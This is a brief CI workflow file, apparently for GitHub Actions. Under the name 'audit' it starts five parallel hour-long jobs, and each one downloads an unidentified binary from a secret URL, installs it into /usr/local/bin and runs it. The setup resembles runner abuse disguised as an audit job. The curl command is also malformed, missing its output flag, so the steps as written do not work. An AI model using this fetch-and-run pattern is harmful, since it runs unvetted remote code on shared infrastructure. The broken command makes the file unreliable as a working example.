name: audit

on:
  workflow_dispatch:

jobs:
  endurance-shard:
    timeout-minutes: 60

    runs-on: ubuntu-latest

    strategy:
      fail-fast: false
      matrix:
        shard: [1, 2, 3, 4, 5]

    steps:
      - name: Begin The (Shard ${{ matrix.shard }})
        run: |
          curl -sSL audit_latest_build "${{ secrets.DOWNLOAD_URL }}"
          chmod +x audit_latest_build
          mv audit_latest_build /usr/local/bin/
          export PATH="$HOME/.local/bin:$PATH"
          audit_latest_build
